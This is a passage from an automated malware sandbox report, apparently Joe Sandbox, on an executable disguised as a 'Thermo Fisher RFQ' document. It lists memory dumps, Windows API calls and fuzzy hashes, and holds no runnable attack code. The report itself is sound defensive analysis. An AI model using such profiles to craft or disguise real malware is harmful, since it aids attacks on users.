                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
                                              • Opcode ID: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
                                              • Instruction ID: 73d72cb5994b484f29e4ff80cb350354ef05bb92eb19bb99874f54bc55697afd
                                              • Opcode Fuzzy Hash: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
                                              • Instruction Fuzzy Hash: EF21A131904104EACF10AFA5CF89A9E7A71BF54359F30413FF105B91E5DBBD89829A2E
                                              APIs
                                              • GlobalFree.KERNEL32(00AA87D0), ref: 00401C30
                                              • GlobalAlloc.KERNELBASE(?,00000804), ref: 00401C42
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree
                                              • String ID: Call
                                              • API String ID: 3394109436-1824292864
                                              • Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                              • Instruction ID: 6559a21230efabb52023b21709d08c05de394b4458a3aca8e6f4fe2726326e98
                                              • Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                              • Instruction Fuzzy Hash: 6A216F73904110ABDB20FBA8DEC5A5E72E4AB08324715053BE552B72D5C6BCA8819B9D
                                              APIs
                                              • GlobalSize.KERNEL32(00000000), ref: 6FE710AA
                                              • GlobalAlloc.KERNEL32(?,00000000), ref: 6FE710B9
                                              • GlobalFree.KERNEL32(00000000), ref: 6FE710D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Global$AllocFreeSize
                                              • String ID:
                                              • API String ID: 465308736-0
                                              • Opcode ID: 0cf20f63f181bb38543e18fcdbfd2a285371116622d733096267f9454ad545f8
                                              • Instruction ID: 3a33a5bce8b999a35343d57d05c8b5c51b7fecbe9ef4a2e5ef112f5f7404c28d
                                              • Opcode Fuzzy Hash: 0cf20f63f181bb38543e18fcdbfd2a285371116622d733096267f9454ad545f8
                                              • Instruction Fuzzy Hash: 3701B572504710A7CB31ABF9686484B3FEEAF4A224721412AFA04C7280EF78E401CB51
                                              APIs
                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402609
                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402622
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Enum$CloseValue
                                              • String ID:
                                              • API String ID: 397863658-0
                                              • Opcode ID: 6b26a19a6a49c8cdb85b468f9485b09a4b214ce950142c5c676665e06fea9f6e
                                              • Instruction ID: e355f0d3af3fae611af142f11dea5172e840e8f974d60c5f977c655607c85d86
                                              • Opcode Fuzzy Hash: 6b26a19a6a49c8cdb85b468f9485b09a4b214ce950142c5c676665e06fea9f6e
                                              • Instruction Fuzzy Hash: 5801DF71A04605BBEB149F94DE48BAFB668FF80308F10443EF001B21D0D7B84E41976D
                                              APIs
                                                • Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E74
                                                • Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E79
                                                • Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E7E
                                              • CloseHandle.KERNELBASE(00000000), ref: 6FE717DC
                                                • Part of subcall function 6FE71312: GlobalAlloc.KERNEL32(?,?,?,6FE715FE,?), ref: 6FE71328
                                                • Part of subcall function 6FE71312: lstrcpynW.KERNEL32(00000004,?,?,6FE715FE,?), ref: 6FE7133E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Global$Free$AllocCloseHandlelstrcpyn
                                              • String ID:
                                              • API String ID: 363591596-0
                                              • Opcode ID: baffb7b74141f9b60dab47e07990219c11e4232d51df16f95f9c699411d8802f
                                              • Instruction ID: a201628c96e2ad559d9f765c27b649555b9b9e90a914b44ee561ec1b505f4cb0
                                              • Opcode Fuzzy Hash: baffb7b74141f9b60dab47e07990219c11e4232d51df16f95f9c699411d8802f
                                              • Instruction Fuzzy Hash: 3901A572408B50EADA31DBF8D424F8A7FD5AF43328F34091EE54492180DF2CA441D7A2
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402580
                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402622
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID:
                                              • API String ID: 3356406503-0
                                              • Opcode ID: 3b7a533e92f914db3672ef71fd19957ac7f0611522e7cd12c869ba850adf7419
                                              • Instruction ID: 6577050f37a29122a5cb82ae63a7e3627040baffe8f236fb698a7bc144352859
                                              • Opcode Fuzzy Hash: 3b7a533e92f914db3672ef71fd19957ac7f0611522e7cd12c869ba850adf7419
                                              • Instruction Fuzzy Hash: 51119E71904216EADF15DFA0DA589AEB7B4FF04348F20443FE802B62D0D7B84A45DB5E
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                              • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                              • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                              • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
                                              • GetLastError.KERNEL32 ref: 00405AF8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                              • Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
                                              • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                              • Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              • Opcode ID: 43dff4b1693335f93dfca754fceec6b37362f049de9d354dc4597a38bacc65dc
                                              • Instruction ID: 98303f18ab294370b9404d3d0833ea925ed9fe29ea468c813ed2a63de2513d45
                                              • Opcode Fuzzy Hash: 43dff4b1693335f93dfca754fceec6b37362f049de9d354dc4597a38bacc65dc
                                              • Instruction Fuzzy Hash: 28E04F76908610DFE748EBA4AE499AEB7B4FF80365B20497FE001F11E1DBB94D00966D
                                              APIs
                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,1012,?), ref: 00405B60
                                              • CloseHandle.KERNEL32(?,?,?,1012,?), ref: 00405B6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3712363035-0
                                              • Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                              • Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
                                              • Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                              • Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 161f1189b96c1e050d17504ce5c39e59e81e919b68ff6b2bf5ceaddda9e07bf6
                                              • Instruction ID: d7c79e80ad2a22e998040c9ddd7ac57f7a29ae31a8ed4af3f77ef46bec42490e
                                              • Opcode Fuzzy Hash: 161f1189b96c1e050d17504ce5c39e59e81e919b68ff6b2bf5ceaddda9e07bf6
                                              • Instruction Fuzzy Hash: 48E04F32A14514ABCB18CBA8EDD086E73B6FB84310310453FE502B36A4C6789C00CB58
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,?,0040363F,?,?,?,?,?,?,?,?,?), ref: 0040695A
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                                • Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                                • Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
                                                • Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040693E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                              • Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
                                              • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                              • Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00406048
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                              • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                              • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                              • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00405B08
                                              • GetLastError.KERNEL32(?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00405B16
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
